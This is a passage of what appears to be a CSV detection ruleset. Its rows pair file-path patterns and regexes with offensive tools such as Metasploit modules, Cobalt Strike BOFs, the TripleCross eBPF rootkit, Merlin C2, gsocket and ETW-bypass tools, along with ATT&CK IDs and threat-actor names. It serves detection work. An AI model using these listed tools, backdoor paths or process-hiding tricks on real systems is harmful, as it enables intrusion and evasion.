TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/enum_proxy.md*",".{0,1000}\/enum_proxy\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/enum_services.md*",".{0,1000}\/enum_services\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/enum_shares.*",".{0,1000}\/enum_shares\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/enum_snmp.md*",".{0,1000}\/enum_snmp\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/enum4linux.py*",".{0,1000}\/enum4linux\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/EnumCLR.c*",".{0,1000}\/EnumCLR\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/enumerate.cna*",".{0,1000}\/enumerate\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*/enumerate/enumerate.py*",".{0,1000}\/enumerate\/enumerate\.py.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","5","446","43","2024-04-26T17:00:08Z","2023-01-06T15:43:27Z" "*/enumeration/azureAd.py*",".{0,1000}\/enumeration\/azureAd\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","352","59","2024-03-21T06:25:58Z","2022-03-01T14:31:27Z" "*/enumeration/azureAzService.py*",".{0,1000}\/enumeration\/azureAzService\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","352","59","2024-03-21T06:25:58Z","2022-03-01T14:31:27Z" "*/enumeration/subdomain.py*",".{0,1000}\/enumeration\/subdomain\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","352","59","2024-03-21T06:25:58Z","2022-03-01T14:31:27Z" "*/enumeration/userenum.py*",".{0,1000}\/enumeration\/userenum\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","352","59","2024-03-21T06:25:58Z","2022-03-01T14:31:27Z" "*/enumeration_process.exe*",".{0,1000}\/enumeration_process\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/epmd-info.nse*",".{0,1000}\/epmd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/eppc-enum-processes.nse*",".{0,1000}\/eppc\-enum\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Erebus/*.dll*",".{0,1000}\/Erebus\/.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*/Erebus/*.exe*",".{0,1000}\/Erebus\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*/Erebus-email.*",".{0,1000}\/Erebus\-email\..{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*/etc/cron.d/ebpfbackdoor*",".{0,1000}\/etc\/cron\.d\/ebpfbackdoor.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/etc/cron.weekly/tor*",".{0,1000}\/etc\/cron\.weekly\/tor.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/etc/default/tor",".{0,1000}\/etc\/default\/tor","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/etc/init.d/tor*",".{0,1000}\/etc\/init\.d\/tor.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/etc/init.d/tor*",".{0,1000}\/etc\/init\.d\/tor.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/etc/init.d/tor2web*",".{0,1000}\/etc\/init\.d\/tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/etc/kidlogger*",".{0,1000}\/etc\/kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/etc/ld.so.preload && rm* process successfully hidden*",".{0,1000}\/etc\/ld\.so\.preload\s\&\&\srm.{0,1000}\sprocess\ssuccessfully\shidden.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/etc/passwd*/.sudo_as_admin_successful*",".{0,1000}\/etc\/passwd.{0,1000}\/\.sudo_as_admin_successful.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*/etc/reverst/*",".{0,1000}\/etc\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*/etc/sudoers.d/ebpfbackdoor*",".{0,1000}\/etc\/sudoers\.d\/ebpfbackdoor.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/etc/sv/tor/log*",".{0,1000}\/etc\/sv\/tor\/log.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/etc/systemd/gsc*",".{0,1000}\/etc\/systemd\/gsc.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*/etc/systemd/system/IMDS.service*",".{0,1000}\/etc\/systemd\/system\/IMDS\.service.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*/etc/tor/*.conf*",".{0,1000}\/etc\/tor\/.{0,1000}\.conf.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/EternalHushCore.dll*",".{0,1000}\/EternalHushCore\.dll.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*/EternalHushFramework.git*",".{0,1000}\/EternalHushFramework\.git.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*/etumbot.profile*",".{0,1000}\/etumbot\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/etw.cna",".{0,1000}\/etw\.cna","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/etw.x64.*",".{0,1000}\/etw\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/etw.x86.*",".{0,1000}\/etw\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/etw-fuck.cpp*",".{0,1000}\/etw\-fuck\.cpp.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*/etw-fuck.exe*",".{0,1000}\/etw\-fuck\.exe.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense 